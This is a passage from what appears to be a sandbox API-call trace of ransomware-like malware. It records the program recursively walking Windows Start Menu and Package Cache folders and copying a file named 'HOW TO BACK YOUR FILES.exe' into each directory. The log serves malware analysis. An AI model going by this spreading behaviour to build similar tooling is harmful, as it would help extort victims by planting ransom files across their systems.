lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories" [0090.723] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories" [0090.723] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.723] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.724] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.724] GetLastError () returned 0x0 [0090.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.724] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.724] CloseHandle (hObject=0x120) returned 1 [0090.725] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.725] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5a47a0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a47a0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.725] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" [0090.725] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" [0090.725] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.725] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\accessories\\windows powershell\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.726] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.726] GetLastError () returned 0x0 [0090.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.726] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.726] CloseHandle (hObject=0x120) returned 1 [0090.726] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.726] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5a512620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a512620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.726] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" [0090.727] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" [0090.727] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.727] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\accessories\\tablet pc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.727] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.727] GetLastError () returned 0x0 [0090.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.727] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.728] CloseHandle (hObject=0x120) returned 1 [0090.728] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.728] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5a55e8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a55e8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.728] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" [0090.728] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" [0090.728] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.728] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\accessories\\system tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.729] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.729] GetLastError () returned 0x0 [0090.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.729] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.729] CloseHandle (hObject=0x120) returned 1 [0090.729] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.729] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5a61cfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a61cfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.730] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" [0090.730] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" [0090.730] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.730] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\accessories\\accessibility\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.730] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.731] GetLastError () returned 0x0 [0090.731] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.731] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.731] CloseHandle (hObject=0x120) returned 1 [0090.731] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.731] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5a643120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a643120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.731] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache" [0090.731] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache" [0090.731] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.731] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\package cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.732] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.732] GetLastError () returned 0x0 [0090.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.732] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.732] CloseHandle (hObject=0x120) returned 1 [0090.732] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.732] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bc17ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc17ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.733] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0090.733] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0090.733] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.733] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.734] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.734] GetLastError () returned 0x0 [0090.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.734] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.734] CloseHandle (hObject=0x120) returned 1 [0090.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.734] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4bc17ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc17ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.734] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0090.734] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0090.735] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.735] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.735] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.735] GetLastError () returned 0x0 [0090.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.735] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.735] CloseHandle (hObject=0x120) returned 1 [0090.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.736] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4bc3de40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc3de40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.736] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0090.736] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0090.736] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.736] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.737] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.737] GetLastError () returned 0x0 [0090.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.737] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.737] CloseHandle (hObject=0x120) returned 1 [0090.737] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.737] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5aa214e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5aa214e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.751] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application 